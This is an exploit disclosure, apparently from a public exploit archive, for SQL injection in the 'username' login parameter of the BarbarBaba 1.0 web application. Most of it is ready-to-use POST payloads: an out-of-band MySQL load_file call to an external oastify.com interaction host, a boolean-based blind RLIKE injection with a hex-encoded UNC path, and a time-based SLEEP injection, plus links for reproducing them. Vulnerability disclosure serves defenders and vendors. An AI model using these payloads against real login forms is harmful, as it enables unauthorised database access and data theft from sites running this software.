# Titles: BarbarBaba-1.0 Copyright©2025-Multiple-SQLi # Author: nu11secur1ty # Date: 07/21/2025 # Vendor: https://www.mayurik.com/ # Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2025/BarbarBaba-1.0/barbarbaba.zip # Reference: https://portswigger.net/web-security/sql-injection ## Description: The `username` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\ n2qpw9b8p3e5jt1re0zo8nmg1772vtxhokccz2nr.oastify.com\\pwu'))+' was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. STATUS: HIGH Vulnerability [+]Payload: - SQLi: ```SQLi --- Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=mayurik'+(select load_file('\\\\ n2qpw9b8p3e5jt1re0zo8nmg1772vtxhokccz2nr.oastify.com\\pwu'))+'' RLIKE (SELECT (CASE WHEN (3348=3348) THEN 0x6d61797572696b+(select load_file(0x5c5c5c5c6e32717077396238703365356a74317265307a6f386e6d6731373732767478686f6b63637a326e722e6f6173746966792e636f6d5c5c707775))+'' ELSE 0x28 END)) AND 'sBfd'='sBfd&password=rootadmin&g-recaptcha-response=mayurik&login=Sign In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=mayurik'+(select load_file('\\\\ n2qpw9b8p3e5jt1re0zo8nmg1772vtxhokccz2nr.oastify.com\\pwu'))+'' AND (SELECT 6232 FROM (SELECT(SLEEP(7)))HKNk) AND 'vySV'='vySV&password=rootadmin&g-recaptcha-response=mayurik&login=Sign In --- ``` # Video: [href](https://www.youtube.com/watch?v=TPi6tolhc7M) # Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2025/BarbarBaba-1.0 ) # Buy me a coffee: [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) # Time spent: 00:55:00